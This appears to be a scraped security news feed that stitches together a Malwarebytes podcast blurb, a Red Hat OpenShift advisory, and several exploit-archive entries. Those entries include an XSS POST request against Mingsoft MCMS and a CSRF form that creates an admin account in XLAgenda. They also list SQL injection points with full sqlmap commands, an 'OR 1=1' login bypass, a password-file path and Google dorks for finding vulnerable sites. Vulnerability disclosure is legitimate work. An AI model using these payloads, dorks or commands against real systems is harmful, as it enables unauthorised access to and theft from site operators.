Categories: Podcast
This week on Lock and Code, we speak with Thomas Reed about how Apple was able to previously address a security loophole that still persists on Windows, and what both companies get wrong (and right) about security. 



(Read more...)




The post How Apple fixed what Microsoft hasn't, with Thomas Reed: Lock and Code S04E16 appeared first on Malwarebytes Labs.

Earlier this month, a group of hackers was spotted using a set of malicious tools—that originally gained popularity with online video game cheaters—to hide their Windows-based malware from being detected.

Sounds unique, right? 

Frustratingly, it isn't, as the specific security loophole that was abused by the hackers has been around for years, and Microsoft's response, or lack thereof, is actually a telling illustration of the competing security environments within Windows and macOS. Even more perplexing is the fact that Apple dealt with a similar issue nearly 10 years ago, locking down the way that certain external tools are given permission to run alongside the operating system's critical, core internals. 

Today, on the Lock and Code podcast with host David Ruiz, we speak with Malwarebytes' own Director of Core Tech Thomas Reed about everyone's favorite topic: Windows vs. Mac. But this isn't a conversation about the original iPod vs. Microsoft's Zune (we're sure you can find countless, 4-hour diatribes on YouTube for that), but instead about how the companies behind these operating systems can _respond_ to security issues in their own products. Because it isn't fair to say that Apple or Microsoft are wholesale "better" or "worse" about security. Instead, they're hampered by their users and their core market segments—Apple excels in the consumer market, whereas Microsoft excels with enterprises. And when your customers include hospitals, government agencies, and pretty much any business over a certain headcount, well, it comes with complications in deciding how to address security problems that won't leave those same customers behind. 

Still, there's little excuse in leaving open the type of loophole that Windows has, said Reed:

> "Apple has done something that was pretty inconvenient for developers, but it really secured their customers because it basically meant we saw a complete stop in all kernel-level malware. It just shows you \[that\] it can be done. You're gonna break some eggs in the process, and Microsoft has not done that yet... They're gonna have to."

Tune in today. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

How Apple fixed what Microsoft hasn't, with Thomas Reed: Lock and Code S04E16

A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.

操作步骤：  
http://ip:port/mcms/search.do  
POST /mcms/search.do HTTP/1.1  
Host: ip:port  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0  
Content-Length: 59  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.7  
Content-Type: application/x-www-form-urlencoded  
Cookie: SHRIOSESSIONID-GOV=4b791a23-fd28-468c-8f24-9d303aebc88f  
Origin: http://ip:port  
Referer: http://ip:port/  
Upgrade-Insecure-Requests: 1  
Accept-Encoding: gzip

content\_title=1&style=%3CScRiPt%3Ealert(123)%3C%2FScRiPt%3E

CVE-2023-3990: 政务版存在xss跨站脚本攻击 · Issue #I7K4DQ · 铭飞/MCMS - Gitee.com

Red Hat Security Advisory 2023-4226-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.6.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.13.6 bug fix and security update  
Advisory ID:       RHSA-2023:4226-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4226  
Issue date:        2023-07-27  
CVE Names:         CVE-2022-41723 CVE-2022-46663 CVE-2023-0464  
                   CVE-2023-0465 CVE-2023-0466 CVE-2023-1255  
                   CVE-2023-1260 CVE-2023-2650 CVE-2023-2700  
                   CVE-2023-2828 CVE-2023-3089 CVE-2023-24329  
                   CVE-2023-24534 CVE-2023-24536 CVE-2023-24537  
                   CVE-2023-24538 CVE-2023-24539 CVE-2023-25173  
                   CVE-2023-27561 CVE-2023-29400 CVE-2023-32067  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.13.6 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.13.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.13.6. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:4229

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* containerd: Supplementary groups are not set up properly (CVE-2023-25173)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.13 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

      The sha values for the release are

      (For x86_64 architecture)  
The image digest is  
sha256:3ca57045e070978b38c36d4c98e188795a6cb4b128130f9c8d7a08b47c133aba

      (For s390x architecture)  
The image digest is  
sha256:f4c42c45cbb85db643e72149d08719896f2c1b70707dde062ef570b4c2bbf6eb

      (For ppc64le architecture)  
The image digest is  
sha256:f219f4a01c3f8c8a15026d80c6cb606775cf53a86673fdb0e0cb5f46a111a105

      (For aarch64 architecture)  
The image digest is  
sha256:4c5ec89db787852cd4118e1f3533e214878ba4335b436f7073296e6955058d1a

All OpenShift Container Platform 4.13 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html.

4. Bugs fixed (https://bugzilla.redhat.com/):

2174485 - CVE-2023-25173 containerd: Supplementary groups are not set up properly  
2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-11539 - multus-admission-controller does not have correct RollingUpdate parameterts when running under Hypershift  
OCPBUGS-15194 - Remove Tech Preview badge from the PAC List and details page  
OCPBUGS-15368 - Service DNS resolutions fails in Windows Pods on converted OVN hybrid clusters  
OCPBUGS-15378 - Critical Alert Rules do not have runbook url  
OCPBUGS-15982 - Load Kamelets as event sources/sinks from custom Camel K operator namespace  
OCPBUGS-16171 - Backporting tls-server-name is missing when using oc client  
OCPBUGS-16172 - Backporting tls-server-name is missing when using oc client  
OCPBUGS-16244 - Operator Backed catalog doesn't show anything when CSV copies are disabled  
OCPBUGS-16372 - Missing support in version 4.13 for multi architecture catalogs for oc-mirror

6. References:

https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-46663  
https://access.redhat.com/security/cve/CVE-2023-0464  
https://access.redhat.com/security/cve/CVE-2023-0465  
https://access.redhat.com/security/cve/CVE-2023-0466  
https://access.redhat.com/security/cve/CVE-2023-1255  
https://access.redhat.com/security/cve/CVE-2023-1260  
https://access.redhat.com/security/cve/CVE-2023-2650  
https://access.redhat.com/security/cve/CVE-2023-2700  
https://access.redhat.com/security/cve/CVE-2023-2828  
https://access.redhat.com/security/cve/CVE-2023-3089  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-24534  
https://access.redhat.com/security/cve/CVE-2023-24536  
https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-25173  
https://access.redhat.com/security/cve/CVE-2023-27561  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkwdS+AAoJENzjgjWX9erEnkQP/RTc7HDidI1c8Y6SzIC54ZDJ  
+gJqLCim88Mz/z797NUOy9Ky3H4+1wjy/bnemEdRcCoVw3wUpWUNRncRUoC2uGQ5  
xa3R/s31qxGeuNyBIGVKCQ0yx6X/sxD0RyJXtk8Z53uxIia7snHcrusUyKjSSmFP  
wDt2tyCMjdd/eJvrsbMkT6HpQdeHTtesyRwqAgaczBFxkRL98FrD3q8OEuNrTq2z  
JSbi31cWi7vejlM60mF8G1mC2kwn+yT1h+W7/FLvzaTQ5WROEYKd8J0d/6+Yxhl9  
HhDv6Z4WVRpGHaC/nb03wirsVw8vF7J/zeqRqrSygB/dDtbnd6zjgqy1CWd+8Qtq  
cfjGV/L2CyszU4zT8YBdnBlJk2ac5ZKaobTE0X+669QdYFLTMY4Y/2qR2XtNK14x  
IwXTAYLU/P6Ykvxz+JXtSkvJT1snUoZH1Mc0akQc055tPr3b0m8szMooha0VwfoB  
/TahgctjrA2OJL2c6l2W3y3BAxyapBFUgk/OXQpaMTOkFi7bNE7mbghUIAWI2K7F  
mnO20Cyc/iDSZyYL3InwK2z8p5KNUkHYdVyt9jc3jaZ8Ig8v302WoyyMZDRv0rmV  
VCMk0pbJzfe2dMyB35TXFvk7sHQDmjCzTk7JeBtaTUhQIc7vjhjyyDRcehsRhElo  
sw61LtTqLTgg3IFoJTTQ  
=6RwC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4226-01

XLAgenda version 4.4 suffers from a cross site request forgery vulnerability.

    ====================================================================================================================================| # Title     : XLAgenda v4.4 CSRF Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://xavier.lequere.net/xlagenda/                                                                               |  | # Dork      : "Propulsé par XLAgenda 4.4"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin.[+] Go to the line 12.[+] Set the target site link Save changes and apply. [+] infected file : /install/install2.php.[+] http://127.0.0.1/xlagenda44/install/install2.php[+] save code as poc.html .<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>XLAgenda 4.4 | Installation</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="robots" content="noindex, nofollow" /><link href="style.css" rel="stylesheet" type="text/css" /></head><body><h1>Installation - Etape 2/3</h1><p class="confirmation">Les tables ont été créées avec succès dans votre base de données.</p><form name="form1" method="post" action="http://127.0.0.1/xlagenda44/install/install2.php">  <h3>Choisissez un nom d'utilisateur et un mot de passe d'administration</h3>  <p>    <label for="user">Nom d'utilisateur :</label><br>    <input name="user" type="text" id="user" value="" maxlength="20" size="30" /> *<br>    (20 caractères maximum)  </p>  <p>    <label for="pass">Mot de passe :</label><br>    <input name="pass" type="password" id="pass" maxlength="15" size="30" /> *<br>    (6 à 15 caractères)  </p>  <p>    <label for="pass2">Introduisez à nouveau le mot de passe :</label><br>    <input name="pass2" type="password" id="pass2" maxlength="15" size="30" /> *  </p>  <p>    <label for="nom">Nom :</label><br>    <input name="nom" type="text" id="nom" value="" size="30" />  </p>  <p>    <label for="prenom">Prénom :</label><br>     <input name="prenom" type="text" id="prenom" value="" size="30" />  </p>  <p>    <label for="email">Adresse email :</label><br>    <input name="email" type="text" id="email" value="" size="30" /> *  </p>  <p>    Les champs marqués d'un * sont obligatoires.<br>    Votre adresse email n'appara&icirc;tra pas sur l'agenda mais est nécessaire pour vous permettre de récupérer votre mot de passe si vous l'avez oublié.  </p>  <p style="text-align:center;">   <input type="submit" name="Submit" value="Continuer >>" />  </p></form></body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

XLAgenda 4.4 Cross Site Request Forgery

WonderCMS version 0.6-Beta suffers from a password disclosure vulnerability.

    ====================================================================================================================================| # Title     : WonderCMS v0.6-Beta Password Disclosure Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : http://wondercms.com/                                                                                              || # Dork      : ©2015 Your website | Powered by WonderCMS | Login                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] /files/password[+] http://127.0.0.1/wondercms/files/passwordGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WonderCMS 0.6-Beta Password Disclosure

xForUp Simple File Uploader version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : xForUp simple file uploader V1.0 Sql injection Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://github.com/munafaqeelmahdi/xForUp-simple-file-uploader-with-php                                            |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/pages.php?page=17 <======| inject here[+]  Panel : http://127.0.0.1/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

xForUp Simple File Uploader 1.0 SQL Injection

B-OBEC version V.092019 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : B-OBEC V.092019 SQL injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://bobec.bopp-obec.info/                                                                                      |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /area_user.php?Area_CODE=1001[+] D:\sqlmap>sqlmap.py -u https://target_site/area_user.php?Area_CODE=1001 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbsGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

B-OBEC V.092019 SQL Injection

BMIT BMS version 2.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BMIT BMS 2.1 Auth BY Pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.bmitsolution.in/softtware_development.php                                                              |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass : ADMIN' OR 1=1#[+] http://127.0.0.1/wwrbsgroupofinstitutioncom/admin/index.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

BMIT BMS 2.1 SQL Injection

AMSS++ version 5.21.09 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMSS++ V5.21.09 JT SQL injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_full_update_5_21.rar                                         |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules/mail/main/maildetail.php?id=174 <===== inject here D:\sqlmap>sqlmap.py -u https://127.0.0.1/amss.ictkan2com/modules/mail/main/maildetail.php?id=174 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --tables -D admin_amssGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

AMSS++ 5.21.09 SQL Injection

AMS Logistics version 2.2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : AMS LOGISTICS 2.2 SQL injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.amslogistics.co.th/#software                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /ai_news_read.php?l_id=AMS23050001 <===== inject here [+] https://127.0.0.1/wtheailogisticscom/ai_news_read.php?l_id=AMS23050001Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#windows